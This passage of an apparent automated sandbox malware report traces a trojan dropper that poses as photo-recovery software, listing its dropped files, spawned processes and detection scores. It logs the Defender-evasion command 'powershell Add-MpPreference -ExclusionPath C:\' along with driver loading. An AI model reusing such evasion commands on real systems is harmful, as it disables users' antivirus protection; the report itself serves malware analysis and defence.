            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_004067B714_2_004067B7
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609300CC14_2_609300CC
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609660FA14_2_609660FA
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6092114F14_2_6092114F
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6091F2C914_2_6091F2C9
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096923E14_2_6096923E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093323D14_2_6093323D
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095C31414_2_6095C314
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095031214_2_60950312
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094D33B14_2_6094D33B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093B36814_2_6093B368
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096748C14_2_6096748C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093F42E14_2_6093F42E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095447014_2_60954470
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609615FA14_2_609615FA
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096A5EE14_2_6096A5EE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096D6A414_2_6096D6A4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_609606A814_2_609606A8
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093265414_2_60932654
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6095566514_2_60955665
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094B7DB14_2_6094B7DB
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096480714_2_60964807
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094E9BC14_2_6094E9BC
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093792914_2_60937929
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6093FAD614_2_6093FAD6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6096DAE814_2_6096DAE8
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_6094DA3A14_2_6094DA3A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60936B2714_2_60936B27
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60954CF614_2_60954CF6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60950C6B14_2_60950C6B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60966DF114_2_60966DF1
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60963D3514_2_60963D35
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60909E9C14_2_60909E9C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60951E8614_2_60951E86
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60912E0B14_2_60912E0B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_60954FF814_2_60954FF8
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D4BAFD14_2_02D4BAFD
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D52A8014_2_02D52A80
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D4D32F14_2_02D4D32F
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D470C014_2_02D470C0
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D3E08914_2_02D3E089
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D5267D14_2_02D5267D
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D4B60914_2_02D4B609
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D4874A14_2_02D4874A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D4BF1514_2_02D4BF15
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D50DB414_2_02D50DB4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D6D0A614_2_02D6D0A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FF88AB253F215_2_00007FF88AB253F2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FF88ABF2E1115_2_00007FF88ABF2E11
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\PhotoRecoveryLib\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess token adjusted: Load DriverJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: String function: 02D47760 appears 32 times
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: String function: 02D52A10 appears 135 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00408C1C appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00406AD4 appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 0040596C appears 117 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00407904 appears 43 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00403400 appears 60 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00445E48 appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00457FC4 appears 77 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00457DB8 appears 102 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00434550 appears 32 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00403494 appears 85 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 004533B8 appears 98 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00446118 appears 58 times
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: String function: 00403684 appears 229 times
            Source: dxRwXy19pq.exeStatic PE information: Resource name: RT_RCDATA type: DOS executable (COM)
            Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp.12.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
            Source: photorecoverylib59.exe.13.drStatic PE information: Resource name: RT_INST type: PE32 executable (EFI application) Intel 80386 (stripped to external PDB), for MS Windows
            Source: is-PDB6I.tmp.13.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: is-PDB6I.tmp.13.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: is-PDB6I.tmp.13.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
            Source: PhotoRecoveryLib.exe.14.drStatic PE information: Resource name: RT_INST type: PE32 executable (EFI application) Intel 80386 (stripped to external PDB), for MS Windows
            Source: is-N40N4.tmp.13.drStatic PE information: Number of sections : 19 > 10
            Source: sqlite3.dll.14.drStatic PE information: Number of sections : 19 > 10
            Source: ded120f6-6c1d-18da-bc8d-0195720b2895.exe.0.drStatic PE information: No import functions for PE file found
            Source: 001[1].exe.0.drStatic PE information: No import functions for PE file found
            Source: dxRwXy19pq.exeBinary or memory string: OriginalFilename vs dxRwXy19pq.exe
            Source: dxRwXy19pq.exe, 00000000.00000002.1329439529.000000000066D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename: vs dxRwXy19pq.exe
            Source: dxRwXy19pq.exe, 00000000.00000000.1214950043.000000000066D000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename: vs dxRwXy19pq.exe
            Source: dxRwXy19pq.exeBinary or memory string: OriginalFilename: vs dxRwXy19pq.exe
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeDriver loaded: \Registry\Machine\System\CurrentControlSet\Services\IV16YfWt_3288Jump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@26/50@0/5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_02D3F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,14_2_02D3F8D0
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_00409448
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,13_2_0045568C
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00455EB4 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,13_2_00455EB4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: CloseServiceHandle,CreateServiceA,CloseServiceHandle,CloseServiceHandle,14_2_004016EB
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004025A0 CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,CloseHandle,CloseHandle,0_2_004025A0
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_0046E5B8 GetVersion,CoCreateInstance,13_2_0046E5B8
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_004057B0 FindResourceA,LoadResource,SizeofResource,LockResource,CreateFileA,WriteFile,0_2_004057B0
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_0040DCE3 StartServiceCtrlDispatcherA,14_2_0040DCE3
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exeCode function: 14_2_0040DCE3 StartServiceCtrlDispatcherA,14_2_0040DCE3
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\001[1].exeJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7944:120:WilError_03
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeFile created: C:\Users\user\AppData\Local\Temp\GuardFoxJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
            Source: photorecoverylib59.exe, photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: photorecoverylib59.exe, photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: photorecoverylib59.exe, photorecoverylib59.exe, 0000000E.00000003.1353263487.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2473544476.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: dxRwXy19pq.exeVirustotal: Detection: 72%
            Source: dxRwXy19pq.exeReversingLabs: Detection: 65%
            Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
            Source: unknownProcess created: C:\Users\user\Desktop\dxRwXy19pq.exe "C:\Users\user\Desktop\dxRwXy19pq.exe"
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeProcess created: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe "C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
            Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeProcess created: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe "C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe"
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp "C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp" /SL5="$303D6,3759395,56832,C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpProcess created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe "C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe" -i
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeProcess created: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe "C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe"Jump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeProcess created: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe "C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\Jump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp "C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp" /SL5="$303D6,3759395,56832,C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpProcess created: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe "C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe" -iJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeSection loaded: ncryptsslp.dllJump to behavior
